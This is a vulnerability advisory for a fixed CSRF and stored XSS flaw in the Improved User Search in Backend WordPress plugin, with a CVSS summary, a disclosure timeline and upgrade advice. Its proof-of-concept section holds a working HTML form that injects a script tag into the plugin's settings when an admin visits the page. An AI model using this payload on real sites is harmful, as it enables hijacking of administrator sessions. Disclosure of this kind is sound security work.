CSRF and XSS in Improved user search allow execution of arbitrary javascript in WordPress admin area


Last revised:

If an attacker can trick an admin (via spearphishing for instance) into following a link they will be able to inject arbitrary JavaScript into the admin interface meaning that their code will be executed by an admin’s browser and will be able to do almost anything an admin user can do (create users, delete posts, etc).

Current state: Fixed

CVSS Summary

CVSS base scores for this vulnerability
Score 6.8 Medium
Vector Network
Complexity Medium
Authentication None
Confidentiality Partial
Integrity Partial
Availability Partial
You can read more about CVSS base scores on Wikipedia or in the CVSS specification.

Proof of concept

Submission of this form on a malicious page visited by an administrator will activate a stored XSS. Some browsers will run alert(1) immediately but if you use a browser which attempts to block reflected XSS you will have to reload the page.

<form action="http://localhost/wp-admin/options-general.php?page=improved-user-search-in-backend/improved-user-search-in-backend.php" method="POST">
  <input type="text" name="iusib_meta_fields" value="&lt;/textarea>&lt;script>alert(1)&lt;/script>">
  <input type="text" name="improved_user_search_in_backend_update" value="true">
  <input type="submit">

Note that no interaction with the malicious page is necessary, as the form itself can be submitted via Javascript. The only action required is to trick the administrator into visiting the page.

Advisory timeline

  • 2014-07-11: Discovered
  • 2014-07-30: Reported
  • 2014-08-02: Author reports issue fixed
  • 2014-08-13: Published

Mitigation/further actions

Upgrade to version 1.2.6 or later.